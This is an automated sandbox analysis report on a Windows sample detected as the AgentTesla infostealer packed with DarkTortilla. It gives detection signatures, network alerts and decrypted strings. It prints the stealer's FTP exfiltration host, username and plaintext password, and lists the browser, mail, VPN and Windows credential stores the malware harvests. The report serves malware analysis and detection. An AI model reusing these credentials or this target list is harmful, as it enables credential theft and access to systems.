Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
tTXQS6DONV.exe

Overview

General Information

Sample name:tTXQS6DONV.exe
renamed because original name is a hash value
Original sample name:5b79bb5c716c9797e048785965be3c3a54a73a587d23d0027130cb31b618e124.exe
Analysis ID:1569277
MD5:2788e0e233dfa0671c63179549ad16ed
SHA1:d9edf6671d0e7abf960a1c5dc8c6a126ec8f2c23
SHA256:5b79bb5c716c9797e048785965be3c3a54a73a587d23d0027130cb31b618e124
Tags:DarkTortillaexeuser-adrian__luca
Infos:

Detection

AgentTesla, DarkTortilla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • tTXQS6DONV.exe (PID: 7036 cmdline: "C:\Users\user\Desktop\tTXQS6DONV.exe" MD5: 2788E0E233DFA0671C63179549AD16ED)
    • InstallUtil.exe (PID: 3840 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DarkTortillaDarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.aminhacorretora.com.br", "Username": "logsftp@aminhacorretora.com.br", "Password": "_yA=,M5*J?KH"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000002.2892478097.0000000005070000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
      00000005.00000002.3406296559.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkTortillaYara detected DarkTortilla CrypterJoe Security
          00000001.00000002.2888881438.0000000003999000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
            00000001.00000002.2888881438.0000000003B0E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
              Click to see the 11 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              1.2.tTXQS6DONV.exe.3bdf172.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                1.2.tTXQS6DONV.exe.3b8bbf2.4.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                  1.2.tTXQS6DONV.exe.3b62122.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    1.2.tTXQS6DONV.exe.3c09450.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                      1.2.tTXQS6DONV.exe.3b8bbf2.4.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                        Click to see the 12 entries

                        Sigma Signatures

                        No Sigma rule has matched

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-05T17:15:13.897832+010020299271A Network Trojan was detected192.168.2.649872162.241.203.3021TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-05T17:15:14.830894+010028555421A Network Trojan was detected192.168.2.649881162.241.203.3034513TCP
                        2024-12-05T17:15:14.951271+010028555421A Network Trojan was detected192.168.2.649881162.241.203.3034513TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: tTXQS6DONV.exeAvira: detected
                        Antivirus detection for URL or domain
                        Source: http://ftp.aminhacorretora.com.brAvira URL Cloud: Label: malware
                        Source: http://aminhacorretora.com.brAvira URL Cloud: Label: malware
                        Found malware configuration
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.aminhacorretora.com.br", "Username": "logsftp@aminhacorretora.com.br", "Password": "_yA=,M5*J?KH"}
                        Multi AV Scanner detection for submitted file
                        Source: tTXQS6DONV.exeReversingLabs: Detection: 68%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for sample
                        Source: tTXQS6DONV.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: /log.tmp
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: .html
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <html>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </html>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: .html
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <html>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </html>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <br>[
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ]<br>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <br>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: .html
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: .zip
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Time:
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <br>User Name:
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <br>Computer Name:
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <br>OSFullName:
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <br>CPU:
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <br>RAM:
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <br>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: IP Address:
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <br>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <hr>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: New
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: IP Address:
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: false
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: false
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: false
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: false
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: false
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: true
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: false
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ftp://ftp.aminhacorretora.com.br
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: logsftp@aminhacorretora.com.br
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: _yA=,M5*J?KH
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: false
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: false
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: appdata
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: XVWmeW
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: XVWmeW.exe
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: XVWmeW
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Type
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <br>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <hr>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <br>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <b>[
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ]</b> (
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: )<br>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {BACK}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {ALT+TAB}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {ALT+F4}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {TAB}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {ESC}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {Win}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {CAPSLOCK}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {KEYUP}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {KEYDOWN}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {KEYLEFT}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {KEYRIGHT}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {DEL}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {END}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {HOME}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {Insert}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {NumLock}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {PageDown}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {PageUp}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {ENTER}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {F1}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {F2}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {F3}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {F4}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {F5}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {F6}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {F7}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {F8}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {F9}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {F10}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {F11}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {F12}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: control
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {CTRL}
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: &amp;
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: &lt;
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: &gt;
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: &quot;
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <br><hr>Copied Text: <br>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <hr>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: logins
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: IE/Edge
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Windows Secure Note
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Windows Web Password Credential
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Windows Credential Picker Protector
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Web Credentials
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Windows Credentials
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Windows Domain Certificate Credential
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Windows Domain Password Credential
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Windows Extended Credential
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SchemaId
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: pResourceElement
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: pIdentityElement
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: pPackageSid
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: pAuthenticatorElement
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: IE/Edge
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UC Browser
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: UCBrowser\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Login Data
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: journal
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: wow_logins
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Safari for Windows
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <array>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <dict>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <string>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </string>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <string>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </string>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: <data>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: </data>
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: -convert xml1 -s -o "
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \fixed_keychain.xml"
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Microsoft\Credentials\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Microsoft\Credentials\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Microsoft\Credentials\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Microsoft\Credentials\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Microsoft\Protect\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: credential
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: QQ Browser
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Tencent\QQBrowser\User Data
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Default\EncryptedStorage
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Profile
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \EncryptedStorage
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: entries
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: category
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: str3
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: str2
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: blob0
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: password_value
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: IncrediMail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: PopPassword
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SmtpPassword
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\IncrediMail\Identities\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Accounts_New
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: PopPassword
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SmtpPassword
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SmtpServer
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: EmailAddress
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Eudora
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: current
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Settings
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: SavePasswordText
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Settings
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ReturnAddress
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Falkon Browser
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \falkon\profiles\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: profiles.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: profiles.ini
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \browsedata.db
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: autofill
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ClawsMail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Claws-mail
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \clawsrc
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \clawsrc
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: passkey0
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: master_passphrase_salt=(.+)
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \accountrc
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: smtp_server
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: address
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: account
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \passwordstorerc
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: {(.*),(.*)}(.*)
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Flock Browser
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: APPDATA
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Flock\Browser\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: signons3.txt
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: DynDns
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ALLUSERSPROFILE
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Dyn\Updater\config.dyndns
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: username=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: password=
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: https://account.dyn.com/
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: t6KzXhCh
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: ALLUSERSPROFILE
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Dyn\Updater\daemon.cfg
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: global
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: accounts
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: account.
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: username
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: account.
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Psi/Psi+
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: name
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: password
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Psi/Psi+
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: APPDATA
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Psi\profiles
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: APPDATA
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \Psi+\profiles
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \accounts.xml
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \accounts.xml
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: OpenVPN
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\OpenVPN-GUI\configs
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: Software\OpenVPN-GUI\configs\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: username
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: auth-data
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: entropy
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: USERPROFILE
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: \OpenVPN\config\
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: remote
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: remote
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: NordVPN
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: NordVPN
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: NordVpn.exe*
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: user.config
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: //setting[@name='Username']/value
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: //setting[@name='Password']/value
                        Source: 1.2.tTXQS6DONV.exe.3b38642.5.unpackString decryptor: NordVPN
